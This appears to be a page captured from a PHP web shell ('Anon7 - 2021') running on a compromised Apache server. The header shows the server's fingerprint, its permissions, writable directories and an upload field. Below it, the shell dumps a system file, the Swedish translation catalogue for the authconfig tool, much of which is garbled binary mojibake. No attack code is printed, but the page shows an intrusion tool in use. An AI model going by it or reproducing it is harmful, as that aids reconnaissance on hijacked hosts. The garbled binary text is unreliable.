KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /usr/share/locale/sv/LC_MESSAGES/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/locale/sv/LC_MESSAGES/authconfig.mo
Ț•çT7ŒhNižșÀÏáæï		$
0
;IO^^{Ú(ß#;BWhzŠčËä;ú+6bnu‹Ÿ”œŐé4I] uŠ–!1=€IgÊ29
ESjoxkŠöû
+?!Dfko|ˆY”îóöù	$‰7
ÁÏßçđśh°t%€5ʶāÎF; "Q !t "– 
č Ä Ń Ú ò !!#!8!@!L!#g!‹!Ą!Á!Ò![Ú!}6"Ž"Œ"Ï"ë"ü"Ž#Á#
Ű#ă#ç#ö#1$/=$m$$Ž$2”$	Ç$Ń$í$ô$%"%
2%(=%0f%0—%1È%ú%&.&)I&[s&_Ï&+/'6['’'§'»'Î'á'ô'((:(5Q( ‡(š(*œ(,è( )+6)%b)1ˆ).ș).é)**%C*(i**’*œ*-Ú*/+$8+<]+5š+=Đ+1,7@,+x,>€,)ă,+
-9-*Y-$„-0©--Ú--.)6.$`.'….)­.Ś.,ó.. /#O/4s/&š/>Ï/ 01/0(a0DŠ0)Ï00ù0**1U1e1Gó1F;2D‚24Ç2ü23/3'C3<k3Qš4ú4ü455&5-565H5P5X5	a5
k5
y5„5›5
Ł5±5cÍ5166:6q6y6#Š6ź6!”6Ś6ç6û67+7@7T7p7?ˆ7*È7ó7ÿ78818G8O8d8 }8ž8ș8Ű8ò89"(9łK9ÿ9: :ƒ,:c°:;;.;H;b;g;p;w‡;ÿ;<<.<;<N<%S<y<~<‚<
•< <xŹ<%=,=0=
3=
>=I=N=U=h=œz=>.>@>H>Q>W>ˆw>ź?	Ż?ˆč?ŚB@ȚAÚùADÔB4C3NC2‚C”CÄCŐCâCęCDD9DPD\DlD3ŠDŸD+ÖDEEhE•ˆEF&F9FVFmFË}FIG_GlGoG‡G2ŁG0ÖGHH.H=6H
tH H H#§HËH	ĘHçH2ôH2'I1ZI7ŒIÄIÍI/èI4JbMJg°J6K9OK‰KŁKŒKÔKìKLL*9LdL6L+žLäL/öL6&M%]M5ƒM)čM5ăM8N8RN.‹N&șN<áN=O\O2tO9§O*áOSP4`P>•P>ÔP6Q+JQHvQ-żQ4íQ#"R3FR'zR3ąR6ÖR6
S,DS$qS:–S;ŃS
T1#T7UT(TJ¶T'UH)U"rU<•U$ÒURśU=JV1ˆV3șVîVŸęVIWOçWO7XJ‡XÒX"äXY5!YąÒœ›Đ‰Vâr”äu8*.{ݟ&OX~ƒŁ%qćĆ'@Š
±|áFÈmĘÁv€<"jwš_ŐŠd Ì •YŽ6$€EM)ipÛ\àxË-BQk„ž?ˆĄWDRI,5š[0	ÆŰ>^ŒçgÚ=ßÄŃSC‹4ÓĂ(Ù»9f“žs¶™Tb·Nc#ÀʜŽč°Hϖ«‚˜Uźh—ŚȘæ‘`!l·©ÊJ’Ț„7ÍłtŒÖ]ԆŸÉ3…șGn
ăÜZ/Âo”ÇKzČL2e1§;:+a}AżPy­ <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><b>Options</b><b>Smart Card</b><dn><domain><lowest-highest><module><realm><server><servers><workgroup>ADS Realm:Admin Server:AlertAuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process will not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCache User _InformationCancelCard Removal _ActionCertificate _URLCon_figure SMB...Configure H_esiod...Configure K_erberos...Configure L_DAP...Configure NI_S...Configure Sma_rt Card...Configure Win_bind...Control how the system verifies users who attempt to log inCreate _home directories on the first loginDo_n't SaveDomainDomain Administrator:Domain Controllers:Domain _AdministratorDomain:Download CA CertificateEnable SMB S_upportEnable Smart _Card SupportEnable _Hesiod SupportEnable _Kerberos SupportEnable _LDAP SupportEnable _NIS SupportEnable _Winbind SupportError downloading CA certificateFor user accounts maintained in local /etc/passwd file system will not check authorization from network services such as LDAP or Kerberos.Hesiod SettingsHesiod _LHSHesiod _RHSHesiod allows a system administrator to publish user and group information in DNS.  It is sometimes used in very large networks.If the home directory of an user doesn't exist yet it will be created automatically on his first login.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsKerberos is a trusted third-party authentication system which is commonly used in medium to large networks.LDAPLDAP Search _Base DNLDAP SettingsLDAP _ServerLDAP authenticationLHS:Local authorization is sufficientLockNISNIS SettingsNIS _DomainNIS _ServerNIS is the Network Information Service.  It is commonly used on small to medium networks.NextNoOkOptionsPassword:RHS:Realm:SMB SettingsSMB authenticationSMB authentication verifies user passwords by attempting to connect to a server which uses the SMB (system message block) protocol suite.Save SettingsSecurity Model:Server:Servers:Shell:Smart Card SettingsSmart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.The Lightweight Directory Access Protocol is a standard way of searching a directory, which can hold arbitrary data in a structured hierarchy. LDAP is increasingly being used in small to large networks.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.To verify the LDAP server with TLS protocol enabled you need a CA certificate which signed the server's certificate. Please fill in the URL where the CA certificate in the PEM format can be downloaded from.Unknown password hashing algorithm specified, using sha256.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse HesiodUse KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse SMB AuthenticationUse Shadow PasswordsUse TLSUse WinbindUse Winbind AuthenticationUse _DNS to resolve hosts to realmsUse _Shadow PasswordsUse _TLS to encrypt connectionsUser InformationWarningWhen enabled /etc/security/access.conf will be consulted for authorization of users access.When enabled allows network services such as LDAP or Kerberos to authenticate system accounts including root on this machine.WinbindWinbind ADS _RealmWinbind Domain Co_ntrollersWinbind SettingsWinbind _DomainWinbind allows a system to retrieve information about users and to authenticate users by using information stored in an NTDOM or ADS server.  It is used in small to large networks.Winbind authenticationWorkgroup:Yes_Admin Servers_Allow offline login_Authenticate system accounts by network services_Check access.conf during account authorization_Domain Controllers_Join Domain_KDCs_Local authorization is sufficient for local users_Password_Password hashing algorithm_Realm_Require smart card for login_Security Model_Template Shell_Workgroupaction to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootcheck access.conf during account authorizationconfigures winbind to allow offline loginconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersconfigures winbind to prevent offline logincreate home directories for users on their first logindefault LDAP base DNdefault LDAP serverdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable SMB authentication by defaultdisable authentication with smart card by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of TLS with LDAPdisable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not check access.conf during account authorizationdo not create home directories for users on their first logindo not display the deprecated text user interfacedo not require smart card for authentication by defaultdo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable SMB authentication by defaultenable authentication with smart card by defaultenable caching of user information by defaultenable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of TLS with LDAPenable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutiongid range winbind will assign to domain or ads usershash/crypt algorithm for new passwordsjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstopposite of --test, update configuration files with changed settingsprobe network for defaults and print themrequire smart card for authentication by defaultsecurity mode to use for samba and winbindshadow passwordthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe group which winbind-created users will have as their primary groupthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]workgroup authentication servers are inProject-Id-Version: authconfig
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2008-01-09 21:30+0100
PO-Revision-Date: 2008-01-27 01:58-0500
Last-Translator: Magnus Larsson <fedoratrans@gmail.com>
Language-Team: Swedish <sv@li.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
 <Tab>/<Alt-Tab> mellan element   |  <Blanksteg> vĂ€ljer   |  <F12> nĂ€sta skĂ€rm*<URL><b>Alternativ</b><b>Smart kort</b><namn><domĂ€n><lĂ€gsta-högsta><modul><realm><server><servrar><arbetsgrupp>ADS-realm:Administrationsserver:VarningAutentiseringAutentiseringskonfigurationAutentiseringsmodulen %s/pam_%s.so saknas. Autentiseringsprocessen kommer inte att fungera korrekt.TillbakaAngiven Ă„tgĂ€rd för uttag av smarta kort Ă€r dĂ„lig.Bas-DN:Cacheinformation_Lagra anvĂ€ndarinformation i cacheAvbryt_ÅtgĂ€rd vid borttagning av kortCertifikat-_URL_Konfigurera SMB..._Konfigurera Hesiod..._Konfigurera Kerberos..._Konfigurera LDAP..._Konfigurera NIS...Konfigurera sma_rta kort..._Konfigurera Winbind...Styr hur systemet verifierar anvĂ€ndare som försöker logga inSkapa _hemkataloger vid första inloggningSpara i_nteDomĂ€nDomĂ€nadministratör:DomĂ€nkontrollanter:DomĂ€n_administratörDomĂ€n:HĂ€mta CA-certifikatAktivera stöd för _SMBAktivera stöd för smarta _kortAktivera stöd för _HesiodAktivera stöd för _KerberosAktivera stöd för _LDAPAktivera stöd för _NISAktivera stöd för _WinbindFel vid hĂ€mtning av CA-certifikatFör anvĂ€ndarkonton som underhĂ„lls i den lokala /etc/passwd-filen kommer systemet inte att kontrollera auktorisering frĂ„n nĂ€tverkstjĂ€nster som exempelvis LDAP eller Kerberos.HesiodinstĂ€llningarHesiod-_LHSHesiod-_RHSHesiod lĂ„ter en systemadministratör publicera anvĂ€ndar- och gruppinformation i DNS. Det anvĂ€nds ibland i mycket stora nĂ€tverk.Om hemkatalogen för en anvĂ€ndare inte finns kommer den skapas automatiskt vid första inloggning.IgnoreraGĂ„ med i domĂ€nMedlemskapsinstĂ€llningarGĂ„r med i Winbind-domĂ€nKDC:KerberosKerberosinstĂ€llningarKerberos Ă€r autentiseringssystem för pĂ„litliga tredjeparter som vanligen anvĂ€nds i mellanstora till stora nĂ€tverk.LDAP_Bassök-DN för LDAPLDAP-instĂ€llningarLDAP-_serverLDAP-autentiseringLHS:Lokal auktorisering Ă€r tillrĂ€ckligtLĂ„sNISNIS-instĂ€llningarNIS-domĂ€nNIS-_serverNIS Ă€r namninformationstjĂ€nsten (Name Information Service). Det anvĂ€nds vanligtvis pĂ„ smĂ„ till medelstora nĂ€tverk.NĂ€staNejOKAlternativLösenord:RHS:Realm:SMB-instĂ€llningarSMB-autentiseringSMB-autentisering verifierar anvĂ€ndarlösenord genom att försöka ansluta till en server som anvĂ€nder protokolluppsĂ€ttningen SMB (System Message Block).SparandeinstĂ€llningarSĂ€kerhetsmodell:Server:Servrar:Skal:InstĂ€llningar för smarta kortAutentisering med smarta kort lĂ„ter dig logga in genom att anvĂ€nda ett certifikat och en nyckel som Ă€r associerad med ett smart kort.En del av konfigurationsĂ€ndringarna du gjort bör sparas innan du fortsĂ€tter. Om du inte sparar dem kan ditt försök att gĂ„ med i domĂ€nen misslyckas. Spara Ă€ndringarna?Mallskal:Filen %s hittades inte, men den krĂ€vs för att stöd för %s ska fungera korrekt.
Installera paketet %s som tillhandahÄller denna fil.LDAP (Lightweight Directory Access Protocol) Àr ett standardsÀtt för att genomsöka en katalog som kan innehÄlla godtyckliga data i en strukturerad hierarki. LDAP anvÀnds mer och mer i smÄ till stora nÀtverk.För att kunna ansluta korrekt till en LDAP-server med TLS-protokollet aktiverat mÄste du ha ett CA-certifikat som signerade din servers certifikat. Kopiera certifikatet i PEM-formatet till katalogen "%s".
Tryck sedan OK.För att kunna ansluta korrekt till en LDAP-server med TLS-protokollet aktiverat mÄste du ha ett CA-certifikat som signerade din servers certifikat. Ange den URL dÀr CA-certifikatet i PEM-format kan laddas ner frÄn.OkÀnd hashningsalgoritm angiven för lösenordet, anvÀnder sha256.AnvÀnd DNS för att _lokalisera KDC:er för realmerAnvÀnd DNS för att lokalisera KDC:er för realmerAnvÀnd DNS för att slÄ upp vÀrdar till realmerAnvÀnd HesiodAnvÀnd KerberosAnvÀnd LDAPAnvÀnd LDAP-autentiseringAnvÀnd MD5-lösenordAnvÀnd NISAnvÀnd SMB-autentiseringAnvÀnd skugglösenordAnvÀnd TLSAnvÀnd WinbindAnvÀnd Winbind-autentiseringAnvÀnd _DNS för att slÄ upp vÀrdar till realmerAnvÀnd _skugglösenordAnvÀnd _TLS för att kryptera anslutningarAnvÀndarinformationVarningOm aktiverad kommer /etc/security/access.conf att rÄdfrÄgas vid autentisering av anvÀndares Ätkomst.NÀr detta Àr aktiverat tillÄts nÀtverkstjÀnster som exempelvis LDAP eller Kerberos att autentisera systemkonton inklusive root pÄ denna maskin.WinbindWinbind ADS-_realmWinbind-domÀn_kontrollanterWinbind-instÀllningarWinbind-_domÀnWinbind lÄter ett system hÀmta information om anvÀndare och autentisera anvÀndare genom att anvÀnda information som lagras i en NTDOM- eller ADS-server. Det anvÀnds i smÄ till medelstora nÀtverk.Winbind-autentiseringArbetsgrupp:Ja_Administrationsservrar_TillÄt offline-inloggning_Autentisera systemkonton genom nÀtverkstjÀnster_Kontrollera access.conf vid konto-autentisering_DomÀnkontrollanter_GÄ med i domÀn_KDC:er_Lokal auktorisering Àr tillrÀckligt för lokala anvÀndare_Lösenord_Hasningsalgoritm för lösenord_Realm_KrÀv smart kort för att logga in_SÀkerhetsmodell_Mallskal_ArbetsgruppÄtgÀrd som ska utföras dÄ smarta kort tas bortautentisera systemkonton endast genom lokala filerautentisera systemkonton genom nÀtverkstjÀnsterauktorisera lokala anvÀndare Àven genom fjÀrrtjÀnstcachningkan endast köras som rootkontrollera access.conf vid konto-autentiseringkonfigurerar winbind att tillÄta offline-inloggningkonfigurerar winbind att anta att anvÀndare utan domÀn i sina anvÀndarnamn Àr domÀnanvÀndarekonfigurerar winbind att anta att anvÀndare utan domÀn i sina anvÀndarnamn inte Àr domÀnanvÀndarekonfigurerar winbind att förhindra offline-inloggningskapa hemkataloger för anvÀndare vid första inloggningstandardbasnamn för LDAPstandardserver för LDAPstandarddomÀn för NISstandardserver för NISstandard-LHS för hesiodstandard-RHS för hesiodstandard-KDC för kerberosstandardadministationsserver för kerberosstandard-realm för kerberosstandard-realm för samba och winbind dÄ security=adsstandardmodul att anvÀnda för smarta kortdialogen avbrötsinaktivera LDAP för autentisering som standardinaktivera LDAP för anvÀndarinformation som standardinaktivera MD5-lösenord som standardinaktivera NIS för anvÀndarinformation som standardinaktivera SMB-autentisering som standardinaktivera autentisering med smarta kort som standardinaktivera cachning av anvÀndarinformation som standardinaktivera hesiod för anvÀndarinformation som standardinaktivera kerberos-autentisering som standardinaktivera skugglösenord som standardinaktivera anvÀndning av DNS för att hitta kerberos-KDC:erinaktivera anvÀndning av DNS för att hitta kerberos-realmerinaktivera TLS med LDAPinaktivera winbind för autentisering som standardinaktivera winbind för anvÀndarinformation som standardinaktivera wins för vÀrdnamnsuppslagningvisa BakÄt istÀllet för Avbryt in huvuddialogen i det textbaserade grÀnssnittetkontrollera inte access.conf vid konto-autentiseringskapa inte hemkataloger för anvÀndare vid första inloggningvisa inte det förÄldrade textbaserade anvÀndargrÀnssnittetkrÀv inte smarta kort för autentisering som standardstarta/stoppa inte portmap, ypbind och nscduppdatera inte konfigurationsfilerna, skriv endast ut nya instÀllningaraktivera LDAP för autentisering som standardaktivera LDAP för anvÀndarinformation som standardaktivera MD5-lösenord som standardaktivera NIS för anvÀndarinformation som standardaktivera SMB-autentisering som standardaktivera autentisering med smarta kort som standardaktivera cachning av anvÀndarinformation som standardaktivera hesiod för anvÀndarinformation som standardaktivera kerberos-autentisering som standardaktivera skugglösenord som standardaktivera anvÀndning av DNS för att hitta kerberos-KDC:eraktivera anvÀndning av DNS för att hitta kerberos-realmeraktivera TLS med LDAPaktivera windbind för autentisering som standardaktivera winbind för anvÀndarinformation som standardaktivera wins för vÀrdnamnsuppslagninggid-intervall som winbind kommer att tilldela domÀn- eller ads-anvÀndarehash/krypto-algoritm för nya lösenordgÄ med i winbind-domÀnen eller ads-realmen som denna administratör nulÀs in CA-certifikat frÄn URL:enlokal auktorisering Àr tillrÀckligt för lokala anvÀndarenamn pÄ servrar att autentisera motmotsatsen till --test, uppdatera konfigurationsfilerna med Àndrade instÀllningarundersök nÀtverket för standardalternativ och skriv ut demkrÀv smarta kort för autentisering som standardsÀkerhetslÀge att anvÀnda för samba och winbindskugglösenorddet tecken som kommer att anvÀndas för att separera domÀn- och anvÀndardelen av winbind-skapade anvÀndarnamn om winbindusedefaultdomain inte Àr aktiveratden katalog som winbind-skapade anvÀndare kommer att ha som hemkatalogerden grupp som winbind-skapade anvÀndare kommer att ha som deras primÀra gruppdet skal som winbind-skapade anvÀndare kommer att ha som deras inloggningsskaluid-intervall som winbind kommer att tilldela domÀn- eller ads-anvÀndareovÀntat argumentuppdatera alla konfigurationsfileranvÀndning: %s [flaggor]servrar för autentisering av arbetsgrupper finns pÄ

Anon7 - 2021